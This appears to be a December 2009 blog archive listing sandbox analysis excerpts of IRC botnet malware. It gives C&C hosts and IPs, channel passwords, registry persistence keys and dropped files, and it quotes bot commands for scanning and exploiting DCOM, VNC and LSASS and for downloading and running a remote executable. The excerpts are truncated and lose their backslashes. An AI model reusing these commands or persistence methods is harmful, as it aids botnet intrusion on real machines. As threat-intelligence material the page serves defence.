Month: December 2009

carb0nf1ber.no-ip.org 94.129.166.204miraclezdohappen.homeip.net 94.129.132.83Outgoing connection to remote server: carb0nf1ber.no-ip.org TCP port 15966Outgoing connection to remote server: miraclezdohappen.homeip.net TCP port 15966Outgoing connection to remote server: miraclezdohappen.homeip.net TCP port 15966 Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Policies” = [REG_EXPAND_SZ, value: C:ProgrammeWindows Updatewinupdates.exe]HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun “Policies” = [REG_EXPAND_SZ, value: C:ProgrammeWindows Updatewinupdates.exe]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “winupdates” = [REG_EXPAND_SZ, value: C:ProgrammeWindows Updatewinupdates.exe]HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “winupdates”Read more...

dec.ham-radio-op.net 208.20.225.248 * C&C Server: 208.20.225.248:6667 * Server Password: * Username: rruwlz * Nickname: jicifv * Channel: #dci (Password: dci2) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612} “StubPath” = c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise12000.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel” File Changes by all processesNew Files c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013Desktop.inic:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise12000.exec:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise12000.exeDeviceRasAcdOpened FilesRead more...

Requested Host: shv4.ath.cxResulting Address: 67.23.11.205 IRC DataUser Name: dpllhqHost Name: 0Server Name: Real Name: USA|5720Nick Name: USA|5720Non RFC Conform: 1ChannelName: #bote2Topic Deleted: :.msn | .rarinject | .scan vnc 100 5 999 -r | .scan dcom2-445 50 5 999 -r | .vnc http://www.ohsn.org/postales/cmd.exe | .dcom2-445 http://www.ohsn.org/postales/cmd.exe | .dl http://www.ohsn.org/postales/cmd.exe C:user.exe 1Private Message DeletedValue: :SecureServ!TS@stats.byroe.net PRIVMSG USA|5720Read more...

* Requested Host: usb.123back.com* Resulting Address: 89.46.101.186 * IRC Data o User Name: nbfspi o Host Name: “” o Server Name: o Real Name: nbfspi o Password: 913199 o Nick Name: vyjdkw o Non RFC Conform: 1 + Channel # Name: #n8# # Password: trb123trb + Notice Message Deleted # Value: :Code.Just.For.Me NOTICE AUTH :***Read more...

Remote Host Port Number ionela.youdontcare.com 6969 NICK eb00a2g USER natation “” “Lelystad.NL.EU.UnderNet.Org” :.12Cainele nu se simte amenintat de inteligenta ta. USERHOST eb00a2g NICK :vaffadt AWAY :.5damn , .2i’m good .6… MODE eb00a2g +i USER manzoni “” “Lelystad.NL.EU.UnderNet.Org” :.12ioti` inc`un dipendent de laba NICK :ld40zik MODE eb00a2g +iwx USER working2 “” “Lelystad.NL.EU.UnderNet.Org” :.12Ce as fute oRead more...

synrules.serveirc.com 188.165.47.211Opened listening TCP connection on port: 113 * C&C Server: 188.165.47.211:6667 * Server Password: * Username: htburv * Nickname: I-[Scan]-265831 * Channel: #syn (Password: ) * Channeltopic: :no NICK I-[Scan]-591967USER sawbsh 0 0 :I-[Scan]-591967USERHOST I-[Scan]-591967MODE I-[Scan]-591967 -x+BJOIN #synNOTICE I-[Scan]-591967 :.VERSION mIRC v6.12 Khaled Mardam-Bey.PRIVMSG #syn :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.PRIVMSG #synRead more...

* Requested Host: rose.linkpc.net * Resulting Address: 58.23.127.130 # IRC Data * User Name: SP2-873 * Host Name: * * Server Name: * Real Name: DWI-9625AC2E275 * Nick Name: USA|XP|SP2|801538 # Transport Protocol: TCP# Remote Address: 58.23.127.130# Remote Port: 8280# Protocol: IRC# Connection Established: 1# Socket: 1848

Remote Host Port Numberv00000000.inluver.com 47221 00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4E49 | PASS letmein..NI00000010 | 434B 205B 4E30 305F 5553 415F 5850 5F35 | CK [N00_USA_XP_500000020 | 3339 3137 3739 5D18 E740 0D0A 5553 4552 | 391779]..@..USER00000030 | 2053 5032 2D39 3431 202A 2030 203A 434F | SP2-941 * 0 :CO00000040Read more...

Remote Host Port Numberj00000000.inluver.com 47221 00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4E49 | PASS letmein..NI00000010 | 434B 205B 4E30 305F 5553 415F 5850 5F39 | CK [N00_USA_XP_900000020 | 3832 3839 3536 5D18 E740 0D0A 5553 4552 | 828956]..@..USER00000030 | 2053 5032 2D36 3935 202A 2030 203A 434F | SP2-695 * 0 :CO00000040Read more...

irc.shkumbimi.net DNS_TYPE_A 122.183.243.48 1 122.183.243.48:12351 Nick: `iuxauoeUsername: `iuxauoeJoined Channel: #.serve with Password krChannel Topic for Channel #.serve: “`adv.start lsass 100 5 0 -r -b -s |`sniff.on -s |`adv.start lsass 75 5 0 114.51.x.x -r -s” Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices o HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRunOnce o HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce * The newly created RegistryRead more...